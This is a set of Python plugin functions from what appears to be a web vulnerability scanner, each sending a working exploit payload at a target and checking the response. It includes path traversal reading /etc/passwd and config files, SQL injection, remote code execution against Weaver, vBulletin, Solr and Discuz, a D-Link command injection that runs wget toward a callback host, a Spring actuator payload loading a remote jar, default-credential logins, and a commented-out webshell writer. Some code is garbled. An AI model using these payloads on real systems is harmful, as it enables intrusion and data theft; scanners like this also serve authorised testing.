def count_status():
red = getredis()
while True:
try:
time.sleep(int(scan_set.get("status_flush_time", 30)))
burpdata_undo = red.llen("burpdata")
if scan_set.get("random_test", False):
# workdata = red.spop("work_data_py_set")
unactive = red.scard("work_data_py_set")
else:
# red.lpush("work_data_py", pickledata)
# workdata = red.lpop("work_data_py")
unactive = red.llen("work_data_py")
vuln = red.llen("vuln_all")
data = red.hmget("count_all", "doned", "request", "block_host",
"request_fail", "active")
burpdata_doned, request, block_host, request_fail, active = list(
map(lambda x: x.decode(), data))
reverse_count = 0
res, resdata = query_reverse("myscan_total")
if res:
reverse_count = int(resdata.get("total"))
if cmd_line_options.command == "hostscan":
logger.warning(
"do/undo/active/unactive:{}/{}/{}/{} vuln:{}/reverse:{}".
format(burpdata_doned, burpdata_undo, active, unactive,
vuln, reverse_count),
text="STATUS")
elif cmd_line_options.command == "webscan":
if cmd_line_options.allow_plugin:
undoplugin = red.llen("plugin_data_py")
logger.warning(
"do/undo/active/unactive/undoplugin:{}/{}/{}/{}/{} req_total/fail:{}/{} blockhost:{} vuln:{}/reverse:{}"
.format(burpdata_doned, burpdata_undo, active,
unactive, undoplugin, request, request_fail,
block_host, vuln, reverse_count),
text="STATUS")
else:
logger.warning(
"do/undo/active/unactive:{}/{}/{}/{} req_total/fail:{}/{} blockhost:{} vuln:{}/reverse:{}"
.format(burpdata_doned, burpdata_undo, active,
unactive, request, request_fail, block_host,
vuln, reverse_count),
text="STATUS")
except KeyboardInterrupt as ex:
logger.warning("Ctrl+C was pressed ,aborted program")
except Exception as ex:
logger.warning("Count stat moudle get error:{}".format(ex))
traceback.print_exc()
pass
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
for file_, search in {"file:///c://windows/win.ini": [b"for 16-bit app support", b"[extensions]"],
"file:///etc/passwd": [b"root:[x*]:0:0:"]}.items():
req = {
"method": "GET",
"url": self.url + "wxjsapi/saveYZJFile?fileName=test&downloadUrl={}&fileExt=txt".format(file_),
"headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout": 10,
"verify": False,
"allow_redirects": False
}
r = request(**req)
if r != None and r.status_code == 200 and "json" in r.headers.get("Content-Type",
"") and b"id" in r.content:
res = re.search("\"id\"\:\"(?P<var>.+?)\"\,", r.text)
if res:
var = res.groupdict().get('var')
req["url"] = self.url + "file/fileNoLogin/{}".format(var)
r1 = request(**req)
if r1 is not None and r1.status_code == 200 and all([re.search(x, r1.content) for x in search]):
parser_ = response_parser(r1)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
rand_s = get_random_str(5)
req = {
"method": "POST",
"url": self.url + "webtools/control/xmlrpc",
"headers": {"Content-Type": "application/xml"},
"data": '''<?xml
version="1.0"?><methodCall><methodName>{rand}</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>'''.format(
rand=rand_s),
"timeout": 10,
"verify": False,
"allow_redirects": False
}
r = request(**req)
if r is not None and r.status_code == 200 and b"methodResponse" in r.content and ("No such service [{}".format(
rand_s)).encode() in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
cmds, hexdata = generate_reverse_payloads("dlink-cve-2019-16920-rce" + self.url)
url = cmds[0].split(" ")[-1]
req = {
"method": "POST",
"url": self.url + "apply_sec.cgi",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
},
"data": '''html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{}'''.format(
url),
"timeout": 10,
"verify": False,
"allow_redirects": False
}
r = request(**req)
res, resdata = query_reverse(hexdata)
if r != None and res:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others":"{} in reverse data".format(hexdata),
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url + "info",
"headers": self.dictdata.get("request").get("headers"),
"timeout": 10,
"verify": False,
"allow_redirects": False
}
r = request(**req)
if r != None and r.status_code == 200 and b"KernelVersion" in r.content and b"RegistryConfig" in r.content and b"DockerRootDir" in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
random_int = get_random_num(5)
req = {
"method":
"GET",
"url":
self.url +
"index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5({})%27"
.format(random_int),
"headers":
self.dictdata.get("request").get("headers"),
"timeout":
10,
"allow_redirects":
False,
"verify":
False,
}
r = request(**req)
if r != None and r.status_code == 200 and (
getmd5(random_int)[10:20]).encode() in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
rand1 = random.randint(40000, 44800)
rand2 = random.randint(40000, 44800)
req = {
"method": "POST",
"url": self.url + "weaver/bsh.servlet.BshServlet",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
},
"data": "bsh.script=print%28{}*{}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw".format(rand1,
rand2),
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and (str(rand1 * rand2)).encode() in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url +
"weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml",
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and b"<url-pattern>/weaver/" in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url + "?a=display&templateFile=README.md",
"headers":
self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout": 10,
"verify": False,
"allow_redirects": False
}
r = request(**req)
if r != None and r.status_code == 200 and b"ThinkCMF" in r.content and b"## README" in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url +
"_plugin/head/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and re.search(
b"root:[x*]:0:0:", r.content):
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url":
self.url + "status%3E%3Cscript%3Exxxxxx(31337)%3C%2Fscript%3E",
"headers":
self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout": 10,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and b'<script>xxxxxx(31337)</script>' in r.content and b'nginx vhost traffic status monitor' in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url + "nexus/service/siesta/capabilities",
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 401:
req["url"] = self.url + "nexus/service/local/authentication/login"
for passwd in ["YWRtaW46YWRtaW4xMjM=", "YWRtaW46YWRtaW4="]:
req["headers"] = {
"Accept": "application/json",
"Authorization": "Basic {}".format(passwd)
}
r = request(**req)
if r != None and r.status_code == 200:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": req.get("url"),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
break
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
num = get_random_num(4)
num_md5 = getmd5(num)
req = {
"method": "GET",
"url": self.url + "viewthread.php?tid=10",
# "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"cookies": {
"GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D":
"/.*/eui",
"GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D":
"print_r(md5({}))".format(num)
},
"timeout": 10,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and num_md5[10:20].encode(
) in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url + "languages.php?id=wechat:wechat&ac=wxregister",
# "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 302 and "set-cookie" in r.headers and "auth" in r.headers[
"set-cookie"] and "location" in r.headers and "wsq.discuz.com" in r.headers[
"location"]:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
random_str = get_random_num(4)
req = {
"method":
"GET",
"url":
self.url +
"tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5"
+ str(random_str) + ";{/dede:field}",
"headers":
self.dictdata.get("request").get("headers"),
"timeout":
10,
"verify":
False,
"allow_redirects":
True
}
r = request(**req)
if r != None and r.status_code == 200 and (getmd5(
str(random_str))[10:20]).encode() in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
user = get_random_str(6).lower()
pass_ = get_random_str(6).lower()
req = {
"method": "POST",
"url": self.url +
"pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1",
"headers": {
"Content-Type": "application/xml",
"X-NITRO-USER": user,
"X-NITRO-PASS": pass_,
},
"data": "<appfwprofile><login></login></appfwprofile>",
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r is not None and r.status_code == 406 and re.search(
"SESSID=\w{32}", r.headers.get("Set-Cookie", "")):
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": req.get("url"),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url +
"index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)",
"headers": self.dictdata.get("request").get("headers"),
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 500 and b"cf79ae6addba60ad018347359bd144d2" in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url + "public/admin.html?s=admin/api.Update/version",
"headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout": 10,
"verify": False,
"allow_redirects": False
}
r = request(**req)
if r != None and r.status_code == 200 and "json" in r.headers.get("Content-Type", ""):
try:
data = r.json()
ver = data.get("data", {}).get("wechat", {}).get("version", "999999999999").replace(".", "")
print(ver)
if int(ver) <= 2020080301:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
except Exception as ex:
print(ex)
pass
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "POST",
"url": self.url + "actuator/env",
"headers": {
"Content-Type": "application/json"
},
"data": '''{
"name": "spring.datasource.hikari.connection-init-sql",
"value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()"
}''',
"timeout": 10,
"verify": False,
}
r = request(**req)
if r is not None and r.status_code == 200 and b"spring.datasource.hikari.connection-init-sql" in r.content and "application/vnd.spring-boot.actuator" in str(
r.headers):
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "POST",
"url": self.url + "rest/tinymce/1/macro/preview",
"headers": {
"Content-Type": "application/json",
"Referer":"http://localhost",
"Host":"localhost"
},
"data":'''{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}''',
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and b"<param-name>contextConfigLocation</param-name>" in r.content :
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": req.get("url"),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
for referer in [
'''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca''',
'''45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a'''
]:
req = {
"method": "GET",
"url": self.url+"user.php",
"headers":{
"Referer":referer,
},
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and b"PHP Version" in r.content and b"<title>phpinfo()</title>" in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
return
def verify(self):
if self.dictdata.get("url").get("protocol") != "https":
return
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url +
"dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/",
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and re.search(
b"root:[x*]:0", r.content):
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 添加限定条件
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
self.parser = dictdata_parser(self.dictdata)
filename = get_random_str(4) + ".txt"
random_str = get_random_str(10)
# payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/" + shell_filename + " && chmod +x /usr/www/" + shell_filename + "||"
payload = "http|echo \"" + random_str + "\" >> /usr/www/" + filename + " && chmod +x /usr/www/" + filename + "||"
req = {
"method": "GET",
"url": self.url + "include/makecvs.php?Event=" + payload,
"verify": False,
"timeout": 10,
}
r = request(**req)
time.sleep(1)
if r is not None and r.status_code == 200 and b"Service,DateTime" in r.content:
req["url"] = self.url + filename
r1 = request(**req)
if r1 is not None and random_str.encode() in r1.content:
parser1 = response_parser(r1)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others": "you can upload your webshell",
"request": parser1.getrequestraw(),
"response": parser1.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url + "include/downmix.inc.php",
"headers": self.dictdata.get("request").get("headers"),
"timeout": 10,
"verify": False,
"allow_redirects": False
}
r = request(**req)
if r != None and r.status_code == 200 and b"Fatal error" in r.content and b"downmix.inc.php" in r.content and b"Call to undefined function helper()" in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "POST",
"url": self.url + "hedwig.cgi",
"headers": {
"Content-Type": "text/xml",
"Cookie": "uid=R8tBjwtFc8"
},
"data":
'''<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>''',
"timeout": 10,
"verify": False,
"allow_redirects": False
}
r = request(**req)
if r != None and r.status_code == 200 and b"</usrid>" in r.content and b"</password>" in r.content and b"<result>OK</result>" in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"url": self.url +
"ueditor/net/controller.ashx?action=catchimage&encode=utf-8",
"method": "GET",
"headers": {
"Accept-Encoding": "deflate"
},
"verify": False,
"timeout": 10,
}
r = request(**req)
if r is not None and r.status_code == 200 and b"\xe6\xb2\xa1\xe6\x9c\x89\xe6\x8c\x87\xe5\xae\x9a\xe6\x8a\x93\xe5\x8f\x96\xe6\xba\x90" in r.content:
parse = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"others":
"you can exploit it by :http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8",
"request": parse.getrequestraw(),
"response": parse.getresponseraw(),
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url + "solr/admin/cores?wt=json",
"headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and b"responseHeader" in r.content:
name = re.search('"name":"(.*?)"', r.text)
if name:
name = name.group(1)
req["method"] = "POST"
req["headers"] = {
"Content-Type": "application/json"
}
req["data"] = '''{
"update-queryresponsewriter": {
"startup": "test",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}'''
req["url"] = self.url + "solr/{name}/config".format(name=name)
r1 = request(**req)
if r1 != None and r1.status_code == 200:
random_1 = get_random_num(4)
random_2 = get_random_num(4)
req1 = {
"method": "GET",
"url": self.url + "solr/{name}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(%24c%3D{r1}%20*%20{r2})%24c".format(
name=name, r1=random_1, r2=random_2),
"headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout": 10,
"allow_redirects": "False",
"verify": False,
}
r2 = request(**req1)
if r2 != None and r2.status_code == 200 and str(random_2 * random_1).encode() in r2.content:
parser_ = response_parser(r2)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url + "v2/",
"headers": self.dictdata.get("request").get("headers"),
"timeout": 10,
"verify": False,
"allow_redirects": False
}
r = request(**req)
if r != None and r.status_code == 200 and "docker-distribution-api-version" in str(
r.headers).lower() and "registry/2.0" in str(
r.headers).lower():
req["url"] = self.url + "v2/_catalog"
r1 = request(**req)
if r1 != None and "application/json" in r1.headers.get(
"Content-Type", "") and b"repositories" in r1.content:
parser_ = response_parser(r1)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
random_int = get_random_num(5)
md5 = getmd5(random_int)
req = {
"method": "POST",
"url": self.url,
"headers": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data": "routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5({rand}))%3bexit%3b".format(
rand=random_int),
"timeout": 10,
"allow_redirects": False,
"verify": False,
}
r = request(**req)
if r is not None and r.status_code == 200 and md5.encode() in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": self.url,
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
def verify(self):
# 根据config.py 配置的深度,限定一下目录深度
if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
return
req = {
"method": "GET",
"url": self.url +
"CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en",
"headers":
self.dictdata.get("request").get("headers"), # 主要保留cookie等headers
"timeout": 10,
"verify": False,
}
r = request(**req)
if r != None and r.status_code == 200 and b"rdspassword="******"encrypted=" in r.content:
parser_ = response_parser(r)
self.result.append({
"name": self.name,
"url": parser_.geturl(),
"level": self.level, # 0:Low 1:Medium 2:High
"detail": {
"vulmsg": self.vulmsg,
"request": parser_.getrequestraw(),
"response": parser_.getresponseraw()
}
})
